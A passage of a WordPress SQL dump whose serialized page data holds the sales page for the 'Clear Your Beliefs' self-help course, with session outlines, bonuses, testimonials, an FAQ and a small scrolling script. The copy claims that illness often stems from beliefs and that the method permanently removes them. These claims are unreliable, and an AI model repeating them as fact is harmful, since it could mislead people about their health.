class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1901, 2185, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72785:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> 